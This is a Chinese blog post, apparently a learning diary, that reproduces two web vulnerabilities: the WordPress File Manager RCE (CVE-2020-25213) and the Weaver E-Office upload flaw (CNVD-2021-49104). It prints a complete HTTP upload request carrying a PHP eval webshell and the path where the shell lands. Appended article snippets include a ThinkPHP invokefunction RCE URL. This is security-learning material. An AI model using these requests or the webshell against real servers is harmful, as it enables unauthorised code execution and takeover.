DAY34:漏洞复现

已于 2022-08-18 16:52:01 修改
阅读量395 收藏 1
点赞数 3
文章标签: php 安全 web安全
于 2022-08-18 16:50:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49433473/article/details/126409243
版权

DAY344:漏洞复现专题

1、CVE-2020-25213 WordPress远程代码执行漏洞复现

参考链接:

https://www.cnblogs.com/Salvere-Safe/p/14995249.html

进入后台

请添加图片描述
请添加图片描述

存在漏洞

请添加图片描述

上传代码(php)文件
请添加图片描述

上传了一句话木马

请添加图片描述

蚁剑连接 getshell

请添加图片描述

2、CNVD-2021-49104 泛微E-Office文件上传漏洞

​ 泛微 e-office 是泛微旗下的一款标准协同移动办公平台。由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行

危害等级:高危

文件上传可直接get webshell

影响版本: 泛微e-office V9.0

进入页面
请添加图片描述

随便写一点数据抓包,构造请求上传文件

首先前提是能登进入(那还不如直接进入后台上传呢)

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 修改
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 193
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php  phpinfo();@eval($_POST['111']);?>

--e64bdf16c554bbc109cecef6451c26a4--

上传成功后访问 /images/logo/logo-eoffice.php

请添加图片描述请添加图片描述

蚁剑连接 getshell

EdmunDJK
关注
漏洞复现】WordPress插件wp-file-manager任意文件上传漏洞(CVE-2020-25213)
做自己喜欢的事,并将其发挥到极致!
09-15 1049
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress当作一个内容管理系统(CMS)来使用。文件管理器允许您直接从WordPress后端编辑、删除、上传、下载、压缩、复制和粘贴文件和文件夹。有史以来功能最强大、最灵活、最简单的WordPress文件管理解决方案。WordPress插件WPFileManager中存在一个严重的安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程代码执行。
WordPress File Manager < 6.9 RCE(CVE-2020-25213漏洞复现
帅醉了的博客
09-28 1729
影响版本: WordPress File Manager < 6.9 最开始被坑,找了这个下载链接,卡还下载不了。 https://plugins.svn.wordpress.org/wp-file-manager/tags/5.9/ 后来发现官网有提供下载链接 https://wordpress.org/plugins/wp-file-manager/advanced/ 由于没有wordpress,也是从零开始。安装多次终于成功 访问 http://192.168.202.134/wordp
Wordpress漏洞
最新发布
weixin_44737168的博客
08-16 441
WordPress的文件管理器插件(wp-file-manager)6.9版本之前存在CVE-2020-25213 漏洞,该漏洞允许远程攻击者上传和执行任意PHP代码。WPScan是Kali Linux默认自带针对wordpress的一款扫描神器。
CNVD-2021-14544 漏洞复现
尐猴子君ii的博客
03-28 4504
大四的生活忙忙碌碌,在绿盟实习和忙毕设,让我划水A了半年,今天写一下最近申请零组文库邀请码,提交的复现文章叭. 贵有恒何必三更眠五更起,最无益只怕一日曝十日寒 话不多说,快上车。 海康威视流媒体管理服务器任意文件读取(CNVD-2021-14544) 1.漏洞说明 海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。 杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞和任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。 2.影响版本 杭州海康威视数字技术股份有限公司 流媒体管理服务器 V2
CNVD-2018-24942漏洞复现
尼德霍格007
07-15 990
CNVD-2018-24942漏洞复现 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-7-11 开始 打开靶场 http://45.159.48.193:42798/ 一个简单的getshell方法 远程代码执行 http://45.159.48.193:42798/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1
Tomcat CVE-2020-1938(CNVD-2020-10487) 漏洞复现
weixin_43740200的博客
01-27 685
Tomcat CVE-2020-1938(CNVD-2020-10487) 漏洞复现 一、漏洞描述 Tomcat是Apache软件基金会Jakarta 项目中的一个核心项目,作为目前比较流行的Web应用服务器,深受Java爱好者的喜爱,并得到了部分软件开发商的认可。Tomcat服务器是一个免费的开放源代码的Web应用服务器,被普遍使用在轻量级Web应用服务的构架中。 2020年1月6日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的Apache Tomcat文件包含漏洞。Tom
CNVD-2022-10270漏洞复现
weixin_42618425的博客
02-18 3543
CNVD-2022-10270漏洞复现
wps的0day漏洞复现.zip
01-05
同时,用户还应该加强网络安全意识,不随意打开未知来源的链接或文件,避免点击恶意广告或下载恶WPS For Windows 部分版本存在远程代码执行漏洞,攻击者可利用该漏洞在受害者目标主机上执行任意代码,控制主机等。...
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
复现这个0day漏洞的步骤通常包括以下几步: 1. **识别易受攻击的端点**:查找Spring Cloud Gateway Actuator API 中开放的,且可能接受SpEL表达式的端点,如`/actuator/gateway/routes`或`/actuator/env`。 2. **...
逃逸IE浏览器沙箱-在野0Day漏洞利用复现
10-13
标题中的“逃逸IE浏览器沙箱-在野0Day漏洞利用复现”指的是针对Internet Explorer(IE)浏览器的安全研究,特别是关于如何利用未公开(0Day)漏洞来突破浏览器的安全沙箱机制。沙箱是一种安全措施,它限制了恶意代码...
CNVD-2019-22238:Fastjson 1.2.47 反序列化漏洞复现
冬的博客
03-16 2160
Fastjson 存在反序列化远程代码执行漏洞,当应用或系统使用 Fastjson 对由用户可控的 JSON 字符串数据进行解析时,将可能导致远程代码执行的危害。
[知识小节]复现cnvd收录的SQl注入漏洞
网络安全知识分享
10-27 8965
SQl注入漏洞复现 出于安全文章中不出现任何关于漏洞的真实url (1)我选择的扫描器是xary,报红如下: (2)使用sqlmap开始跑跑跑 思路:我们要做的就是搞到管理员的用户名和密码,因为不同公司的数据库存放的信息不同,有的数据库内容过多,跑数据的时候耗时特别长,所以当我们发现库名、表名有可能存放敏感信息的时候就要果断放弃无用的数据。 步骤: a、检测是否有注入 b、跑数据库名 c、跑表名 d、跑字段 e、跑字段中的数据 注:我们最后的到的用户名密码可能是经过加密的,我们可以试着用md5和base
spring framework远程代码执行漏洞复现(CNVD-2022-23942 CVE-2022-22965)
yang1234567898的博客
04-18 7081
3 月 30 日,国家信息安全漏洞共享平台(CNVD)接收到蚂蚁科技集团股份有限公司报送的 Spring 框架远程命令执行漏洞(CNVD-2022-23942)。攻击者利用该漏洞,可在未授权的情况下远程执行命令。CNVD 对该漏洞的综合评级为“高危”。 漏洞影响: JDK9+ 使用了 Spring 框架或衍生框架 Apache Tomcat 作为 Servlet 容器 spring-webmvc 或 spring-webflux 依赖 Spring Framework 版本 5.3.0..
泛微OA E-cology(CNVD-2019-32204)远程命令执行漏洞复现分析
洋洋的小黑屋
03-16 2729
漏洞复现 影响版本: E-cology 7.0 E-cology 8.0 E-cology 8.1 E-cology 9.0 直接在网站根目录后加入组件访问路径 /weaver/bsh.servlet.BshServlet/,如下图执行了命令“whoami” 绕过方式: 1.unicode编码 2.字符串拼接 bsh.script=eval%00("ex"%2b"ec(bsh.httpSer...
CNVD-2021-12793 启明天清汉马USG防火墙弱口令漏洞复现
afei001
04-24 2127
目录 1.前言 2.漏洞概述 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 FOFA实战复现 6.漏洞修复 声明:请勿进行非授权测试,否则后果自负。 1.前言 2021HW期间,互联网威胁情报中就有该漏洞。这个漏洞也挺无语的,因为在网上搜到最早是墨者学院的一个靶场。CNVD公开日期2021年3月11日,而这篇博客的时间是在19年7月份,无语吧。没想到FOFA随便找一下还真有,心也真够大的,放在公网上,默认密码都不改。 ...
redis未授权访问-cnvd 2015-0755漏洞复现
weixin_53747497的博客
02-04 799
未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
WordPress插件File-Manager任意文件上传漏洞复现CVE-2020-25213
千寻的博客
01-26 1908
文章目录漏洞名称漏洞编号插件介绍漏洞描述影响版本实验环境及准备第一步 搭建wordpress第二步 下载插件,导入目录中第三步 查看漏洞复现步骤第一步 安装模块 jq 模块第二步 检查漏洞是否存在第三步 访问上传的hello.php第四步 上传shell.php修复建议参考链接摘抄 漏洞名称 WordPress的插件 wp-file-manager 文件上传漏洞 漏洞编号 CVE-2020-25213 插件介绍 WP-file-manager是一个旨在帮助WordPress管理员管理其站点上的文
0day安全:深度解析Windows漏洞分析与防护
"《0day安全:软件漏洞分析技术(第2版)》是一部深度探讨Windows平台缓冲区溢出漏洞分析、检测与防护的专业书籍。全书共分五篇33章,结构严谨,内容涵盖了漏洞exploit的基础理论、前沿技术攻防策略、软件安全测试、...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值